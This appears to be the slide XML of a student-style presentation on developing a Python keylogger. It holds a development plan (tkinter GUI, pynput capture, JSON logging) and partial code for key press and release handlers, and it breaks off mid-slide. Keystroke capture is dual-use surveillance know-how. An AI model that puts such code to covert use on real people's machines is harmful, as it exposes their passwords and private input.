              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Calibri Light"/>
              <a:cs typeface="Calibri Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048602" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="1800" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048603" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="581192" y="1120210"/>
            <a:ext cx="11328400" cy="3838452"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0" bIns="198375" compatLnSpc="1" lIns="0" numCol="1" rIns="0" tIns="198375" vert="horz" wrap="non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r>
              <a:rPr altLang="en-US" baseline="0" b="1" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>The following is the development approach for the new keylogger:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400" eaLnBrk="0" fontAlgn="base" hangingPunct="0" indent="0" latinLnBrk="0" lvl="0" marL="0" marR="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr altLang="en-US" baseline="0" b="1" cap="none" dirty="0" sz="1100" i="0" kumimoji="0" lang="en-US"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AutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Design the GUI: Create a simple GUI using </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" err="1" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>tkinter</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t> that includes a start and stop button.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400" eaLnBrk="0" fontAlgn="base" hangingPunct="0" indent="0" latinLnBrk="0" lvl="0" marL="0" marR="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Implement the keylogger functionality: Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="1" cap="none" dirty="0" sz="3200" i="0" kumimoji="0" lang="en-US" normalizeH="0" err="1" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>pynput</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t> library to capture the key presses and releases.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400" eaLnBrk="0" fontAlgn="base" hangingPunct="0" indent="0" latinLnBrk="0" lvl="0" marL="0" marR="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Implement JSON file generation: Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="1" cap="none" dirty="0" sz="3200" i="0" kumimoji="0" lang="en-US" normalizeH="0" err="1" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t> library to generate a JSON file that contains the</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400" eaLnBrk="0" fontAlgn="base" hangingPunct="0" indent="0" latinLnBrk="0" lvl="0" marL="0" marR="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
            </a:pPr>
            <a:r>
              <a:rPr altLang="en-US" dirty="0" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t> keylogging data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400" eaLnBrk="0" fontAlgn="base" hangingPunct="0" indent="0" latinLnBrk="0" lvl="0" marL="0" marR="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Integrate the keylogger functionality with the GUI: Connect the GUI buttons to the keylogger functionality.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400" eaLnBrk="0" fontAlgn="base" hangingPunct="0" indent="0" latinLnBrk="0" lvl="0" marL="0" marR="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
            </a:pPr>
            <a:endParaRPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="914400" eaLnBrk="0" fontAlgn="base" hangingPunct="0" indent="0" latinLnBrk="0" lvl="0" marL="0" marR="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr altLang="en-US" baseline="0" b="0" cap="none" dirty="0" sz="2000" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Test the keylogger: Test the keylogger on different systems and scenarios to ensure its functionality.</a:t>
            </a:r>
          </a:p>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dirty="0" sz="3200" i="0" kumimoji="0" lang="en-US" normalizeH="0" strike="noStrike" u="none">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>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04" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="1" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048605" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="380989" y="477169"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" i="0" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="1" dirty="0" sz="2000" i="0" lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097153" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1767592" y="2813831"/>
            <a:ext cx="8087854" cy="1524213"/>
          </a:xfrm>
          <a:prstGeom prst="rec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06" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="1" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048607" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="218429" y="-431231"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" i="0" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>Create GUI</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0" sz="2000" i="0" lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="1" dirty="0" sz="2000" i="0" lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2097154" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="1745289"/>
            <a:ext cx="10955279" cy="4667901"/>
          </a:xfrm>
          <a:prstGeom prst="rec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08" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="1" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048609" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296711" y="-427071"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" i="0" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="1" dirty="0" sz="2000" i="0" lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048610" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="5632311"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t># Initialize the variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> = []</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>keys = ""</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    if flag == False:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>            {'Pressed': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        flag = True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>            {'Held': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>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11" name="Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="1" sz="4400" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048612" name="Content Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296711" y="-427071"/>
            <a:ext cx="11029615" cy="4673324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" i="0" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="374151"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="__Inter_aaf875"/>
              </a:rPr>
              <a:t>1.Import the necessary libraries:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="1" dirty="0" sz="2000" i="0" lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="374151"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="__Inter_aaf875"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" marL="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048613" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535680" y="1640839"/>
            <a:ext cx="5608320" cy="5078313"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    keys = keys + str(key)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
